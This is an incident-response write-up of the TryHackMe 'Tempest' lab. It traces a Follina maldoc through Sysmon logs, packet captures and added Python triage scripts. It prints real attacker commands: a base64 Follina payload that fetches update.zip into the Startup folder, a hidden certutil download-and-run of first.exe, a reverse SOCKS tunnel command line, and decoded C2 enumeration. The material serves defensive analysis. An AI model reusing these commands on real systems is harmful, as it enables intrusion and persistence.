Tempest
You are tasked with investigating a workstation affected by a full attack chain.
CONTEXT
I. Background
In this incident, you will act as an Incident Responder working from an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert is of CRITICAL severity and needs further investigation.
Challenge Link: TryHackMe - Tempest
II. Tools and Artifacts
Conversion of Log Files
Conversion of EVTX files to JSON using EvtxECmd:
PS> .\EvtxECmd\EvtxECmd.exe -f sysmon.evtx --json .\ --jsonf sysmon.json
Metrics (including dropped events)
Event ID   Count
1          238
2          2
3          92
5          3
8          3
11         1,024
12         186
13         869
15         6
22         136
PS> .\EvtxECmd\EvtxECmd.exe -f windows.evtx --json .\ --jsonf windows.json
Metrics (including dropped events)
Event ID   Count
1102       1
4624       43
4625       4
4648       9
4720       2
4722       2
4724       3
4728       2
4732       3
4738       3
4797       34
4798       27
4799       12
5379       51
5382       2
Protocol Hierarchy (pcap)
$ tshark -r capture.pcapng | sed -e 's/^[ ]*\w*\s*//g' | sed -E 's/\s{2,}/ /g' | cut -d' ' -f5 | sort | uniq -c | sort -bnr
16305 TCP
1883 TLSv1.2
1709 HTTP
734 WebSocket
548 TLSv1.3
21 TLSv1
13 HTTP/XML
6 SSL
ANALYSIS
I. Initial Access
MALICIOUS DOCUMENT
As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:
The malicious document has a .doc extension.
The user downloaded the malicious document via chrome.exe.
The malicious document then executed a chain of commands to attain code execution.
The maldoc was downloaded to the workstation via the browser. This was confirmed through the file-creation logs (Sysmon Event ID 11) whose source process is chrome.exe. The matching record is for the file's Zone.Identifier alternate data stream, the Mark-of-the-Web that Chrome writes next to every download; it is created by the same process at the same moment as the .doc itself, so it is valid evidence of the download:
$ cat sysmon.json | grep EventId..11 | grep chrome.exe | grep ".doc" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | .[0]*.[1]*.[2]'
{
"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
"TargetFilename": "C:\\Users\\benimaru\\Downloads\\free_magicules.doc:Zone.Identifier",
"CreationUtcTime": "2022-06-20 17:12:56.193"
}
The file was downloaded from phishteam.xyz (167.71.199.191):
$ tshark -r capture.pcapng -Y "http" | grep free_magicules.doc
1367 89.506977 192.168.254.107 → 167.71.199.191 HTTP 595 GET /02dcf07/free_magicules.doc HTTP/1.1
$ tshark -r capture.pcapng -Y 'frame matches "free_magicules.doc"' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.*")) then ({key: .key, value: .value}) else empty end)'
{
"http.host": "phishteam.xyz",
"http.request.line": "If-Modified-Since: Mon, 20 Jun 2022 16:01:32 GMT\r\n",
"http.connection": "keep-alive",
"http.user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36",
"http.accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"http.accept_encoding": "gzip, deflate",
"http.accept_language": "en-US,en;q=0.9",
"http.request.full_uri": "http://phishteam.xyz/02dcf07/free_magicules.doc",
"http.request": "1",
"http.request_number": "1"
}
The file, free_magicules.doc, was then opened in Microsoft Word (WINWORD.EXE):
$ cat sysmon.json | grep EventId..1, | grep free_magicules | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^CommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
{
"UtcTime": "2022-06-20 17:13:12.410",
"ProcessId": "496",
"Image": "C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
"CommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n \"C:\\Users\\benimaru\\Downloads\\free_magicules.doc\" /o \"\"",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=09B09DC651D921FE022B16C234E64A12,SHA256=E25F32401FD3D25958B8B99F280F0325B232E54F185CC5D6E0710923005AC64A,IMPHASH=744185317F5DAAFAEB367DDD2932CC02",
"ParentProcessId": "6596"
}
Spawned from the Microsoft Word process (ParentProcessId 496) was msdt.exe, which is highly indicative of the Follina exploit (CVE-2022-30190): Word has no legitimate reason to launch the Microsoft Support Diagnostic Tool.
$ cat sysmon.json | grep EventId..1, | grep -i "id..496" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^CommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
{
"UtcTime": "2022-06-20 17:13:35.180",
"ProcessId": "4868",
"Image": "C:\\Windows\\SysWOW64\\msdt.exe",
"CommandLine": "C:\\Windows\\SysWOW64\\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=4EBC38519675FB0BA6915D0D8A7FCD01,SHA256=1BE8AFD2962596807611E6A8836952D6BBDC24BDE52A34905006FF78F1AD5D12,IMPHASH=AF42CCE29BF30BC07C0496AF0420FD91",
"ParentProcessId": "496"
}
Exploring the CommandLine parameter of the suspected Follina execution, the payload contains a base64-encoded portion:
C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
Which, when decoded, becomes the following (beautified):
$app=[Environment]::GetFolderPath('ApplicationData');
cd "$app\Microsoft\Windows\Start Menu\Programs\Startup";
iwr http://phishteam.xyz/02dcf07/update.zip -outfile update.zip;
Expand-Archive .\update.zip -DestinationPath .;
rm update.zip;
The decoded payload changes directory to the user's Startup folder, downloads update.zip from the same host that served the maldoc, extracts it in place and deletes the archive, leaving only the extracted contents to run at the next logon. The PowerShell being executed through the ms-msdt: URI handler, together with sdiagnhost.exe (the Scripted Diagnostics host that msdt.exe hands the troubleshooting pack to) being the process that writes the file into the Startup folder, confirms abuse of the Follina exploit:
$ cat sysmon.json | grep EventId..11 | grep update.zip | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
{
"Image": "C:\\Windows\\SysWOW64\\sdiagnhost.exe",
"TargetFilename": "C:\\Users\\benimaru\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.zip",
"CreationUtcTime": "2022-06-20 17:13:37.822"
}
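As an added triage example (not part of the original writeup), the following Python reproduces the decode above programmatically and turns the observable traits of this command line into detection indicators: the ms-msdt: URI, the PowerShell sub-expression inside IT_BrowseForFile, the [char] obfuscation, and the ../ traversal that ends at a benign system binary. The msdt.exe command line is the one from the Sysmon record above; the "benign" comparison command line is constructed for illustration and is not from the page. Python is used so the check runs offline without tshark or jq.

```python
import base64
import re

# The msdt.exe command line from the Sysmon Event ID 1 record above (page data).
MSDT_CMDLINE = (
    r'C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param '
    r'"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression('
    r"$(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString("
    r"[System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'"
    r"JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=="
    r"'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
    r'"'
)

# Constructed for comparison (not from the page): a troubleshooter launch from the Explorer
# context menu that points IT_BrowseForFile at a plain path. No sub-expression, no traversal.
BENIGN_CMDLINE = (
    r'C:\Windows\System32\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param '
    r'"IT_LaunchMethod=ContextMenu IT_BrowseForFile=C:\Users\benimaru\Desktop\report.exe"'
)

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # only long base64-looking runs


def decode_b64_runs(text):
    """Return every long base64 run in `text` that decodes to printable text (CR/LF/TAB allowed)."""
    found = []
    for m in B64_RUN.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error: bad length or characters, not real base64
            continue
        decoded = raw.decode("utf-8", errors="replace")
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            found.append(decoded)
    return found


def triage_msdt(cmdline):
    """Indicators that separate Follina-style abuse from an ordinary troubleshooter launch."""
    lower = cmdline.lower()
    return {
        "ms_msdt_uri": "ms-msdt:" in lower,
        "pcwdiagnostic": "/id pcwdiagnostic" in lower,
        # IT_BrowseForFile=$( ... ) means the parameter is evaluated as PowerShell
        "powershell_subexpr": re.search(r"IT_BrowseForFile=\$\(", cmdline) is not None,
        "char_obfuscation": "[char]" in lower,
        "path_traversal": "/../" in cmdline or "\\..\\" in cmdline,
        "decoded_payloads": decode_b64_runs(cmdline),
    }


def is_follina(indicators):
    """ms-msdt: URI combined with any code-execution tell-tale."""
    return indicators["ms_msdt_uri"] and (
        indicators["powershell_subexpr"]
        or indicators["char_obfuscation"]
        or indicators["path_traversal"]
    )


if __name__ == "__main__":
    for name, cmd in (("sysmon record", MSDT_CMDLINE), ("constructed benign", BENIGN_CMDLINE)):
        t = triage_msdt(cmd)
        print(f"{name}: follina={is_follina(t)}")
        for payload in t["decoded_payloads"]:
            print("  decoded:", payload.strip())
```

Running the script prints the decoded Startup-folder dropper for the Sysmon command line and "follina=False" for the constructed benign launch; the same function can be pointed at every Event ID 1 CommandLine whose Image ends in msdt.exe.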
STAGE 2 EXECUTION
Based on the initial findings, we discovered that there is a stage 2 execution:
The document has successfully executed an encoded base64 command.
Decoding this string reveals the exact command chain executed by the malicious document.
Since update.zip was written to, and expanded in, the Startup folder, the logon activity of the compromised user (benimaru) was reviewed and the processes spawned by winlogon.exe were traced. Two logons are visible; the second one (17:14:50) is the first logon after the Startup folder was seeded at 17:13:37:
$ cat sysmon.json | grep EventId..1, | grep -i "winlogon.exe" | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
{
"UtcTime": "2022-06-20 17:12:24.262",
"ProcessId": "5968",
"Image": "C:\\Windows\\System32\\userinit.exe",
"CommandLine": "C:\\Windows\\system32\\userinit.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=BF8825D08BC235F0609CA8BBEF4E179C,SHA256=1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394,IMPHASH=8419D97ABDFEB6C320F0C39028647572",
"ParentProcessId": "5612",
"ParentCommandLine": "winlogon.exe"
}
{
"UtcTime": "2022-06-20 17:14:50.535",
"ProcessId": "3408",
"Image": "C:\\Windows\\System32\\userinit.exe",
"CommandLine": "C:\\Windows\\system32\\userinit.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=BF8825D08BC235F0609CA8BBEF4E179C,SHA256=1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394,IMPHASH=8419D97ABDFEB6C320F0C39028647572",
"ParentProcessId": "1396",
"ParentCommandLine": "winlogon.exe"
}
Following the second logon, userinit.exe started explorer.exe, and Explorer (which runs the items in the Startup folder) spawned a PowerShell execution that downloads the stage 2 payload (first.exe):
$ cat sysmon.json | grep EventId..1, | grep -i "parent.*id..3408" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
{
"UtcTime": "2022-06-20 17:14:50.606",
"ProcessId": "5784",
"Image": "C:\\Windows\\explorer.exe",
"CommandLine": "C:\\Windows\\Explorer.EXE",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959",
"ParentProcessId": "3408",
"ParentCommandLine": "C:\\Windows\\system32\\userinit.exe"
}
$ cat sysmon.json | grep EventId..1, | grep -i "parent.*id..5784" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
[..omitted..]
{
"UtcTime": "2022-06-20 17:15:10.547",
"ProcessId": "9052",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\\Users\\Public\\Downloads\\first.exe; C:\\Users\\Public\\Downloads\\first.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
"ParentProcessId": "5784",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE"
}
Looking at the command executed, certutil.exe was used as the downloader and the payload was written to the Public Downloads folder (writable by every local user) and then run:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe
The logs shown below prove the successful download and execution of first.exe. Note that the file's CreationUtcTime (14:29) predates the UtcTime of the write event (17:15): Sysmon reports the creation timestamp carried by the file itself, so the event's UtcTime is the value to use in the timeline:
$ cat sysmon.json | grep EventId..11 | grep first.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'
{
"UtcTime": "2022-06-20 17:15:14.096",
"Image": "C:\\Windows\\system32\\certutil.exe",
"TargetFilename": "C:\\Users\\Public\\Downloads\\first.exe",
"CreationUtcTime": "2022-06-20 14:29:54.049"
}
$ cat sysmon.json | grep EventId..1, | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add | select(.Image | test(".*first.exe"))'
{
"UtcTime": "2022-06-20 17:15:14.129",
"ProcessId": "8948",
"Image": "C:\\Users\\Public\\Downloads\\first.exe",
"CommandLine": "\"C:\\Users\\Public\\Downloads\\first.exe\"",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=C9AA36F483B61CFA9758C44ACDB776AC,SHA256=CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8,IMPHASH=468991D410EEFBCFB478FB910DDA2CE2",
"ParentProcessId": "9052",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\\Users\\Public\\Downloads\\first.exe; C:\\Users\\Public\\Downloads\\first.exe"
}
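The ancestry above (winlogon.exe, userinit.exe, explorer.exe, powershell.exe, first.exe) was assembled by hand with successive greps on ProcessId and ParentProcessId. As an added example, not code from the original writeup, the Python below does the same walk over EvtxECmd-style JSON lines. The sample records are constructed here in the layout the page's jq filters rely on (a Payload string holding EventData.Data as "@Name"/"#text" pairs), with PIDs, images and parents copied from the Sysmon records shown above; the early svchost.exe line is an invented decoy that reused PID 9052 hours earlier, to show why the parent must be picked by time and not by PID alone (Sysmon's ProcessGuid/ParentProcessGuid fields avoid this ambiguity entirely and should be preferred when present).

```python
import json


def _sysmon_proc(utc, pid, image, cmdline, ppid, parent_image):
    """Build one EvtxECmd-style JSON line for a Sysmon Event ID 1 record (constructed sample)."""
    data = [
        {"@Name": "UtcTime", "#text": utc},
        {"@Name": "ProcessId", "#text": str(pid)},
        {"@Name": "Image", "#text": image},
        {"@Name": "CommandLine", "#text": cmdline},
        {"@Name": "ParentProcessId", "#text": str(ppid)},
        {"@Name": "ParentImage", "#text": parent_image},
    ]
    return json.dumps({"EventId": 1, "Payload": json.dumps({"EventData": {"Data": data}})})


# Constructed sample log: values mirror the records on the page except the svchost decoy.
SAMPLE_LOG = [
    _sysmon_proc("2022-06-20 09:00:00.000", 9052, r"C:\Windows\System32\svchost.exe",
                 "svchost.exe -k netsvcs", 700, r"C:\Windows\System32\services.exe"),  # decoy
    _sysmon_proc("2022-06-20 17:14:50.535", 3408, r"C:\Windows\System32\userinit.exe",
                 r"C:\Windows\system32\userinit.exe", 1396, r"C:\Windows\System32\winlogon.exe"),
    _sysmon_proc("2022-06-20 17:14:50.606", 5784, r"C:\Windows\explorer.exe",
                 r"C:\Windows\Explorer.EXE", 3408, r"C:\Windows\System32\userinit.exe"),
    _sysmon_proc("2022-06-20 17:15:10.547", 9052,
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -noni certutil -urlcache -split -f "
                 r"'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; "
                 r"C:\Users\Public\Downloads\first.exe", 5784, r"C:\Windows\explorer.exe"),
    _sysmon_proc("2022-06-20 17:15:14.129", 8948, r"C:\Users\Public\Downloads\first.exe",
                 r'"C:\Users\Public\Downloads\first.exe"', 9052,
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    _sysmon_proc("2022-06-20 17:18:48.723", 7388, r"C:\Users\benimaru\Downloads\ch.exe",
                 r'"C:\Users\benimaru\Downloads\ch.exe" client 167.71.199.191:8080 R:socks',
                 8948, r"C:\Users\Public\Downloads\first.exe"),
]


def load_process_events(lines):
    """Flatten Sysmon Event ID 1 records from EvtxECmd JSON lines into {field: value} dicts."""
    events = []
    for line in lines:
        rec = json.loads(line)
        if rec.get("EventId") != 1:
            continue
        data = json.loads(rec["Payload"])["EventData"]["Data"]
        events.append({d["@Name"]: d.get("#text") for d in data})
    # UtcTime is fixed-width "YYYY-MM-DD HH:MM:SS.mmm", so string order is time order.
    events.sort(key=lambda e: e["UtcTime"])
    return events


def find_process(events, pid, before=None):
    """Latest creation event for `pid` at or before `before`. PIDs are reused, so time matters."""
    hits = [e for e in events
            if e["ProcessId"] == str(pid) and (before is None or e["UtcTime"] <= before)]
    return hits[-1] if hits else None


def ancestry(events, pid):
    """Process chain from the earliest known ancestor down to `pid`."""
    chain, seen = [], set()
    proc = find_process(events, pid)
    while proc is not None and proc["ProcessId"] not in seen:
        seen.add(proc["ProcessId"])
        chain.append({"pid": int(proc["ProcessId"]), "image": proc["Image"], "utc": proc["UtcTime"]})
        parent = find_process(events, proc["ParentProcessId"], before=proc["UtcTime"])
        if parent is None:
            # No creation event for the parent (it started before logging began, like
            # winlogon.exe here): fall back to what the child's own record says about it.
            chain.append({"pid": int(proc["ParentProcessId"]), "image": proc["ParentImage"], "utc": None})
        proc = parent
    chain.reverse()
    return chain


def children(events, pid, after):
    """Processes spawned by `pid` at or after `after` (the grep 'parent.*id' step above)."""
    return [e for e in events if e["ParentProcessId"] == str(pid) and e["UtcTime"] >= after]


if __name__ == "__main__":
    evts = load_process_events(SAMPLE_LOG)
    for node in ancestry(evts, 7388):
        print(f"{node['utc'] or '(before logging)':<23} {node['pid']:>5}  {node['image']}")
```

Point the loader at the real sysmon.json (one record per line) and call ancestry() with the PID of any suspicious process; the decoy shows that without the time bound the walk would attribute first.exe to svchost.exe.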
Sysmon network connection logs (Event ID 3) show that the execution of first.exe results in callbacks to resolvecyber.xyz (167.71.222.162) on port 80:
$ cat sysmon.json | grep EventId..3, | grep first.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^U|^Source(Ip|Port)|^Destination(Ip|Port)"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add' | grep -E "Destination" | sort | uniq
"DestinationIp": "167.71.222.162",
"DestinationPort": "80",
"DestinationPortName": "http"
$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.host")) then ({key: .key, value: .value}) else empty end)' | grep http.host | uniq
"http.host": "resolvecyber.xyz"
"http.host": "resolvecyber.xyz:8080"
MALICIOUS DOCUMENT TRAFFIC
Based on the collected findings, we discovered that the attacker fetched the stage 2 payload remotely:
We discovered the Domain and IP invoked by the malicious document on Sysmon logs.
There is another domain and IP used by the stage 2 payload logged from the same data source.
Network traffic from first.exe shows requests to the URI path /9ab62b5 with the user agent Nim httpclient/1.6.6, the default of Nim's standard HTTP client, which indicates the implant was written in Nim:
$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" | head -n 1
5159 227.738875 192.168.254.107 → 167.71.222.162 HTTP 161 GET /9ab62b5 HTTP/1.1
$ tshark -r capture.pcapng -Y "frame.number==5159" -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.*")) then ({key: .key, value: .value}) else empty end)'
{
"http.host": "resolvecyber.xyz",
"http.request.line": "user-agent: Nim httpclient/1.6.6\r\n",
"http.connection": "Keep-Alive",
"http.user_agent": "Nim httpclient/1.6.6",
"http.request.full_uri": "http://resolvecyber.xyz/9ab62b5",
"http.request": "1",
"http.request_number": "1"
}
Requests carrying a ?q= GET parameter with a base64-encoded value are also seen. The bare GET /9ab62b5 requests appear to be the implant polling for tasking, while the ?q= requests carry results back:
$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" -T fields -e http.request.uri
/9ab62b5
/9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K
/9ab62b5
/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K
/9ab62b5
[..omitted..]
II. Discovery
Based on the collected findings, we have discovered that the malicious binary continuously uses the C2 traffic:
We can easily decode the encoded string in the network traffic.
The traffic contains the command and output executed by the attacker.
HTTP requests with base64-encoded payloads were parsed and decoded with the following loop. Note the trailing dash in -f2-: cut -d'=' -f2 on its own stops at the first '=' and therefore also drops the base64 '=' padding, which is what makes base64 print "invalid input" for some records.
$ for i in $(tshark -r capture.pcapng -Y '(ip.dst==167.71.222.162 and tcp.port eq 80) and frame contains "?q="' -T fields -e http.request.uri | cut -d'=' -f2-); do
>   echo "$i" | base64 -d;   # each record decodes to '<command> - <output>'
> done
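As an added example that is not part of the original writeup, the Python below decodes the same traffic without tshark or jq, handling the two things the shell loop gets wrong: a q= value whose '=' padding was stripped (re-padded before decoding), and '+' characters in standard base64 (extracted without urllib.parse.parse_qs, which would rewrite them as spaces). The two encoded URIs are the ones printed above; the third record is constructed here and has its padding removed on purpose to reproduce the failure.

```python
import base64
import binascii

# Request URIs exactly as printed by `tshark -T fields -e http.request.uri` above (page data).
PAGE_URIS = [
    "/9ab62b5",
    "/9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K",
    "/9ab62b5",
    "/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K",
]

# Constructed record in the same '<command> - <output>' shape, with its '=' padding removed
# to reproduce what `cut -d'=' -f2` does to a padded value (79 bytes -> two '=' dropped).
_CONSTRUCTED = b"dir C:\\Users\\benimaru\\Downloads\\ch.exe - Directory: C:\\Users\\benimaru\\Downloads"
STRIPPED_SAMPLE = base64.b64encode(_CONSTRUCTED).decode().rstrip("=")


def q_param(uri):
    """Raw q= value from a request URI.
    Deliberately not urllib.parse.parse_qs: that rewrites '+' to ' ' and would corrupt base64."""
    if "?" not in uri:
        return None  # a bare GET /9ab62b5 is the implant polling for tasking
    for pair in uri.split("?", 1)[1].split("&"):
        key, sep, value = pair.partition("=")  # split on the first '=' only, padding survives
        if sep and key == "q":
            return value
    return None


def strict_decode_fails(s):
    """True when the standard decoder rejects `s` (e.g. padding missing)."""
    try:
        base64.b64decode(s, validate=True)
        return False
    except binascii.Error:
        return True


def b64_decode_lenient(s):
    """Decode base64 whose trailing '=' padding may have been lost."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4), validate=True)


def parse_record(raw):
    """Split a decoded '<command> - <output>' record; output keeps its inner line structure."""
    text = b64_decode_lenient(raw).decode("utf-8", errors="replace")
    command, sep, output = text.partition(" - ")
    if not sep:  # record without an output section
        return {"command": text.strip(), "output": ""}
    return {"command": command.strip(), "output": output.strip()}


def decode_transcript(uris):
    """Ordered command/output records for every URI that carries a q= parameter."""
    records = []
    for uri in uris:
        q = q_param(uri)
        if q is not None:
            records.append(parse_record(q))
    return records


if __name__ == "__main__":
    for rec in decode_transcript(PAGE_URIS):
        print(">", rec["command"])
        print(rec["output"])
    print("strict decode of padding-stripped value fails:", strict_decode_fails(STRIPPED_SAMPLE))
    print("lenient decode:", parse_record(STRIPPED_SAMPLE))
```

Feed it the full URI list from tshark (one per line) to reconstruct the whole operator transcript; the lenient decoder is what recovers the records the shell loop reported as "invalid input".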
Each decoded record has the form "<command> - <output>", rendered below as a ">"-prefixed command followed by its output. The threat actor had Remote Code Execution (RCE) through this non-interactive HTTP command channel. Initial enumeration covered the current user context, the existing user directories, and the local users and administrators:
> whoami
tempest\benimaru
> pwd
Path
----
C:\Windows\system32
> dir C:\Users
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/20/2022 9:06 PM benimaru
d-r--- 6/20/2022 4:03 PM Public
d----- 6/20/2022 11:52 PM rimuru
> net users
User accounts for \\TEMPEST
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed successfully.
> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
The command completed successfully.
> net user benimaru
User name benimaru
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/20/2022 9:18:04 PM
Password expires Never
Password changeable 6/20/2022 9:18:04 PM
Password required No
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/21/2022 1:14:49 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.
Next, they began exploring the current user context's home directory:
> dir C:\Users\benimaru
Directory: C:\Users\benimaru
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 6/20/2022 4:13 PM 3D Objects
d-r--- 6/20/2022 4:13 PM Contacts
d-r--- 6/21/2022 12:27 AM Desktop
d-r--- 6/20/2022 9:20 PM Documents
